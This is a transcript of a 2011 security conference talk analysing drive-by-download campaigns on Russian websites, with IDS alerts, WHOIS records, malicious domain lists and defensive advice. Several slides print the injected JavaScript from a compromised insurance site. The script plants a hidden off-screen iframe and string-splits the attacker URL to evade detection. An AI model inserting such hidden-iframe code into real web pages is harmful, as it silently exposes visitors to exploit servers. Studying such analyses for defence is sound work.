vladimir kropotov - drive-by-download attack evolution before and after vulnerabilities’...
DESCRIPTION
International Security Conference "ZeroNights 2011" - http://www.zeronights.org/TRANSCRIPT
![Page 1: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/1.jpg)
Drive-By-Download Attack Evolution Before and After Vulnerability
Disclosure
Vladimir B. Kropotov TBINFORM (TNK-BP Group)
![Page 2: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/2.jpg)
Drive-By-Download
• Hackers distribute malware by "poisoning" legitimate websites
• Hacker injects malicious iframes into HTML content
• Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used by attacker
You just want information
about insurance, nothing
more, but…
![Page 3: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/3.jpg)
What does it look like?
PC connected to
the Internet
Intermediate server
controlled by attacker
Known server with
iframe
Malware
Host ready
Exploit
Exploit server
controlled by attacker
Malware server
controlled by attacker
OS, browser
plugins, etc. INFO
![Page 4: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/4.jpg)
How we find it? Date/Time 2011-08-05 10:44:53 YEKST
Tag Name PDF_XFA_Script
Observance Type Intrusion Detection
Cleared Flag false
Target IP Address 10.X.X.X
Target Object Name 9090
Target Object Type Target Port
Target Service unknown
Source IP Address 10.X.X.Y
SourcePort Name 2359
:compressed zlib
:server total.logeater.org
:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
![Page 5: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/5.jpg)
How we find it? Date/Time 2011-08-05 10:44:53
Tag Name PDF_XFA_Script
Target IP Address 10.X.X.X
Target Object Name 9090
Target Object Type Target Port
Source IP Address 10.X.X.Y
SourcePort Name 2359
:compressed zlib
:server total.logeater.org
:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
DOES USER NEED IT??
![Page 6: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/6.jpg)
First indicators Date/Time 2011-07-26 11:24:37
Tag Name PDF_XFA_Script
arg 3592ba48df0fae9e5f5c5b09535a
070d0b04020600510f0c56075c0
6040750
compressed zlib
server mamjhvbw.dyndns.pro
URL /ghqlv3ym/
![Page 7: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/7.jpg)
First indicators
Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
server e1in.in
URL /stat/574a353789f/pda.js
Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
:clsid CAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
server skipetar.in
URL /jb/pda.js
![Page 8: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/8.jpg)
First indicators
Date/Time 2011-08-18 19:00:13
Tag Name PDF_XFA_Script
arg host=http://e1in.in/stat&u=root
compressed zlib
server e1in.in
URL /stat/574a353789f/lastrger.php
Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
compressed gzip
server inaptly.in
URL /jb/lastrger.php
Date/Time 2011-08-14 14:06:28
Tag Name PDF_XFA_Script
:arg host=http://oligist.in&b=486def4
:compressed gzip
:server oligist.in
:URL /jb/lastrger.php
![Page 9: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/9.jpg)
First indicators Date/Time 2011-07-26 11:24:37
Tag Name PDF_XFA_Script
arg 3592ba48df0fae9e5f5c5b09535a
070d0b04020600510f0c56075c0
6040750
compressed zlib
server mamjhvbw.dyndns.pro
URL /ghqlv3ym/
Date/Time 2011-08-18 19:00:13
Tag Name PDF_XFA_Script
arg host=http://e1in.in/stat&u=root
compressed zlib
server e1in.in
URL /stat/574a353789f/lastrger.php
Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
server e1in.in
URL /stat/574a353789f/pda.js
Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
compressed gzip
server inaptly.in
URL /jb/lastrger.php
Date/Time 2011-08-14 14:06:28
Tag Name PDF_XFA_Script
:arg host=http://oligist.in&b=486def4
:compressed gzip
:server oligist.in
:URL /jb/lastrger.php
Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
:clsid CAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
server skipetar.in
URL /jb/pda.js
![Page 10: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/10.jpg)
Example: o-strahovanie.ru
![Page 11: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/11.jpg)
Example: o-strahovanie.ru
![Page 12: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/12.jpg)
Example: o-strahovanie.ru SEP 02 / ============ bbb
============document.xmlSettings.if_ik=false;if(window.localStorage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time(); else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) }); document.xmlSettings.iframe=document.createElement('iframe'); document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;'; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
Cookie:
if_ik1315314771
www.o-strahovanie.ru/
16004293056256333102392
93001403230174358*
![Page 13: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/13.jpg)
Example: o-strahovanie.ru / ============ bbb ============
else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){
document.xmlSettings.iframe=
document.createElement('iframe'); document.xmlSettings.iframe.style.cssText=
'height:1px;position:absolute;width:1px;border:none;left:-5000px;';
document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.
iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
Cookie: if_ik1315314771
www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
![Page 14: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/14.jpg)
Example: o-strahovanie.ru else{// 4 osel …
document.body.appendChild(document.xmlSettings.iframe);
document.xmlSettings.iframe.src=
'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
iframe.src=
'http://disregarding.in/xtqd2/08.php'
![Page 15: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/15.jpg)
Drive By Download o-strahovanie.ru Sep 02
PC connected to
the Internet
Intermediate server
disregarding.in
Known server with
iframe
Malware
Host ready
Exploit NO
Exploit
server
NO
Malware
server
OS, browser
plugins, etc. INFO
![Page 16: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/16.jpg)
Drive By Download o-strahovanie.ru Sep 12
PC connected to
the Internet
Intermediate server
disregarding.in
Known server with
iframe
Malware
Host ready
Exploit
Exploit server
chamberwoman.in
janiculum.in
Malware server
chamberwoman.in
janiculum.in
OS, browser
plugins, etc. INFO
![Page 17: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/17.jpg)
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN
Created On:14-Jul-2011 11:09:59 UTC
Registrant Name:Russell Rosario
Registrant Street1:136 Oakdale Avenue
City:Winter Haven
Registrant Country:US
Email:[email protected]
Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN
Created On:12-Sep-2011 08:14 UTC
Registrant Name:Russell Rosario
![Page 18: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/18.jpg)
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN
Created On:14-Jul-2011 11:09:59 UTC
Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN
Created On:12-Sep-2011 08:14 UTC
Registrant Name:Russell Rosario
No Payload, because No Payload Requests?
Are they looking for customers?
![Page 19: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/19.jpg)
Example: o-strahovanie.ru Domain ID:D5165642-AFIN Domain
Name:DISREGARDING.IN
Created On:14-Jul-2011 11:09:59 UTC
Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue
City:Winter Haven
Registrant Country:US
Email:[email protected] Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
![Page 20: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/20.jpg)
Russell Rosario
filtrated.in Created On:14-Jul-2011 11:09:56 UTC
raptnesses.in Created On:14-Jul-2011 11:09:56 UTC
tansies.in Created On:14-Jul-2011 11:10:03 UTC
Domain Name:FILTRATED.IN Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web
Services Pvt. Ltd. (R118-AFIN) Registrant ID:TS_16731618
Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue Registrant City:Winter Haven Registrant State/Province:Florida Registrant Postal Code:33830 Registrant Country:US Registrant Phone:+1.8635571308
Email:[email protected]
But Sally Doesn't Know…
![Page 21: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/21.jpg)
Attack before public disclosure
• Primary location for malicious sites: .IN
• Physical servers location by IP-Address: Romania
• Responsible person: Russell Rosario
• Domains are new
![Page 22: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/22.jpg)
Domain owner is the same
Domain Name Created On Registrant Name
irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario
comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario
hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario
suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario
ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario
20-Jul-2011 Acrobat Vulnerability vendor notified
![Page 23: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/23.jpg)
Vulnerability reported to vendor VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
X. DISCLOSURE TIMELINE
-----------------------------
2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
2011-09-14 - Public disclosure
ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-26 - Coordinated public release of advisory
ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-27 - Coordinated public release of advisory
![Page 24: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/24.jpg)
Harvetering machine started Domain Name Created On Registrant Name
microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario
oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario
provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario
vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario
kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario
invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario
alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario
dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario
xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario
alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario
skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario
inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario
allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
![Page 25: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/25.jpg)
But may be someone knows?
• Spamlists
• AV Vendors
• Safebrowsing
• Securityfocus
![Page 26: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/26.jpg)
Spamlists, Aug 19
![Page 27: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/27.jpg)
AV Vendors, Aug 18
![Page 28: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/28.jpg)
Safebrowsing Aug 20
![Page 29: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/29.jpg)
Securityfocus Sep 07 Sent: Wednesday, September 07, 2011 11:31 PM
Subject: There is a strange get request header in all web
pages of my site? I'm worry about Trojan attack!
Today I found that Kasper Anti Virus has blocked my site
and says to the clients that this site is affected by a Trojan.
I traced my site with Fiddler debugging tool and I found
that every time I send a request
to the site a GET request handler is established
to the following URL:
"http://carlos.c0m.li/iframe.php?id=v4pfa2
4nw91yhoszkdmoh413ywv6cp7"
![Page 30: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/30.jpg)
PDF vulnerabilities public disclosure Sep 14. What to expect?
![Page 31: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/31.jpg)
PDF vulnerabilities public disclosure Sep 14. What to expect?
NO GOOD NEWS,
JUST EPIC FAIL
for site administrators
![Page 32: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/32.jpg)
No good news. Hundreds of domains were registered
ITALIA-NEW.IN
BANER-KLERK.RU
BANK-KLERK.RU
BANNER-KLERK.RU
BLOGS-KLERK.RU
BUH-KLERK.RU
DAILY-KP.RU
FORUM-KLERK.RU
I-OBOZREVATEL.RU
INTERFAX-REGION.RU
JOB-KLERK.RU
KLERK-BANK.RU
KLERK-BANKIR.RU
KLERK-BIZ.RU
KLERK-BOSS.RU
KLERK-BUH.RU
KLERK-EVEN.RU
KLERK-EVENTS.RU
KLERK-LAW.RU
KLERK-NEW.RU
KLERK-NEWS.RU
KLERK-REKLAMA.RU
KLERK-RU.RU
KLERK-WORK.RU
KLERK2.RU
OBOZREVATEL-RU.RU
OBOZREVATELRU.RU
WIKI-KLERK.RU
PRESS-RZD.RU
RZD-RZD.RU
IPGEOBASE.IN
* * *
![Page 33: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/33.jpg)
“New generation”
PC connected to
the Internet
Intermediate server
controlled by attacker
Known server with
iframe
Malware
Host ready
Exploit
Exploit server
controlled by attacker
Malware server
controlled by attacker
OS, browser
plugins, etc. INFO
Other known server
NOT controlled by attacker
![Page 34: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/34.jpg)
Attack after public disclosure • Primary location for malicious sites:
.IN, .RU, .CX.CC, .BIZ, .INFO,…
• Physical servers location by IP-Address: International
• Domains registered to different spurious persons
• Domain lifetime ~ time to Blacklists appearance
• Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique)
• If you don't know exact malware URL, site redirects to well known server
• Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
![Page 35: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/35.jpg)
Known sites examples: RZD.RU Russian rail roads
![Page 36: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/36.jpg)
Known sites examples: RZD.RU
![Page 37: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/37.jpg)
Known sites examples: RZD.RU Russian rail roads
![Page 38: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/38.jpg)
Known sites examples: RZD.RU
![Page 39: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/39.jpg)
Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
![Page 40: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/40.jpg)
Known sites examples: KP.RU
![Page 41: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/41.jpg)
Other examples: EG.RU (newspaper, 263 685 visits per day)
![Page 42: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/42.jpg)
Other examples: svpressa.ru (newspaper 276 720 visits per day)
![Page 43: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/43.jpg)
Malware examples: Banks targeted attack
![Page 44: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/44.jpg)
Malware examples: Banks targeted attack
![Page 45: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/45.jpg)
• Legal
• Faked
Another news,
another phone…
![Page 46: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/46.jpg)
Malware examples: Banks targeted attack
![Page 47: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/47.jpg)
Malware examples
![Page 48: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/48.jpg)
Malware examples
![Page 49: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/49.jpg)
Script examples
![Page 50: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/50.jpg)
Sample analysis (Virus Total)
![Page 51: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/51.jpg)
Sample analysis (Virus Total)
![Page 52: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/52.jpg)
Sample analysis (Virus Total)
![Page 53: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/53.jpg)
Sample analysis (Virus Total)
![Page 54: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/54.jpg)
Sample analysis (Virus Total)
![Page 55: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/55.jpg)
Sample analysis (Virus Total)
![Page 56: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/56.jpg)
What can we do?
• Patch endpoint
• Tighten the Internet filtering (default deny
if possible)
• No Internet surfing with admin rights
• See what’s happening (continuous
monitoring)
• Check if you’re well (regular technical
audits)
• Educate people
![Page 57: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/57.jpg)
Credits
• Sergey V. Soldatov,
TBINFORM (TNK-BP Group)
• Konstantin Y. Kadushkin,
TBINFORM (TNK-BP Group)
• Wayne Huang,
ARMORIZE
![Page 58: Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes](https://reader033.vdocuments.mx/reader033/viewer/2022052619/55658964d8b42a723f8b525b/html5/thumbnails/58.jpg)
THE END
Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group)